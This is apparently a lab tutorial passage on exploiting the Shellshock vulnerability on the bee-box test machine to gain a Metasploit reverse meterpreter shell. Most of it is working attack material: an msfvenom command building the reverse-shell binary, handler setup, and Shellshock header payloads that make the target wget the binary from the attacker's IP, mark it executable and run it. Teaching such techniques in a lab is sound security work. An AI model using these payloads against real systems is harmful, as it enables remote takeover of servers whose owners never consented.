For this exercise, have both the Kali and bee-box virtual machines running, then follow the next steps:

1. First, we use msfvenom to generate our reverse meterpreter shell, setting it up to connect back to the Kali machine's IP address. Open a Terminal in Kali and issue the following command:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.10 LPORT=4443 -f elf > cute_dolphin.bin

This will create a file named cute_dolphin.bin, which is a reverse Linux meterpreter shell; reverse means that it will connect back to the attacking machine instead of listening for us to connect.

2. Next, we need to set up a listener for the connection our cute dolphin is going to create. Open a msfconsole terminal and once it loads, issue the following commands:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.56.10
set lport 4443
run

As you can see, the payload, lhost, and lport are the ones we used to create the .bin file. This is the IP address and TCP port the program is going to connect to, so we will need to listen on that network interface of our Kali Linux and over that port. The final exploit configuration should look as follows:

3. Now we have our Kali ready, it's time to prepare the attack on the victim. Let's start the Apache service as the root and run the following code:

service apache2 start

4. Then, copy the malicious file to the web server folder:

cp cute_dolphin.bin /var/www/html/

5. Now we proceed to the exploitation. We know bee-box is vulnerable to Shellshock and will use it to make the server download the malicious file. Exploit Shellshock on the server with the following payload: 

() { :;}; echo "Vulnerable:" $(/bin/sh -c "/usr/bin/wget http://192.168.56.10/cute_dolphin.bin -O /tmp/cute_dolphin.bin;chmod +x /tmp/cute_dolphin.bin; ls -l /tmp/cute_dolphin.bin")

The last two parts of the payload are for setting the execution permission to the downloaded file (chmod +x /tmp/cute_dolphin.bin) and to make sure the file was downloaded (ls -l /tmp/cute_dolphin.bin). As the following screenshot shows, a successful exploitation will return the filename and its properties:

6. With the file in the server, we exploit Shellshock again to execute it: () { :;}; echo "Vulnerable:" $(/tmp/cute_dolphin.bin").
7. If everything goes right, we should see a connection being received in our Metasploit's listener, as illustrated as follows:

8. Once the session is established, we can use the help command to see the functionality of meterpreter and start to run commands on the compromised server: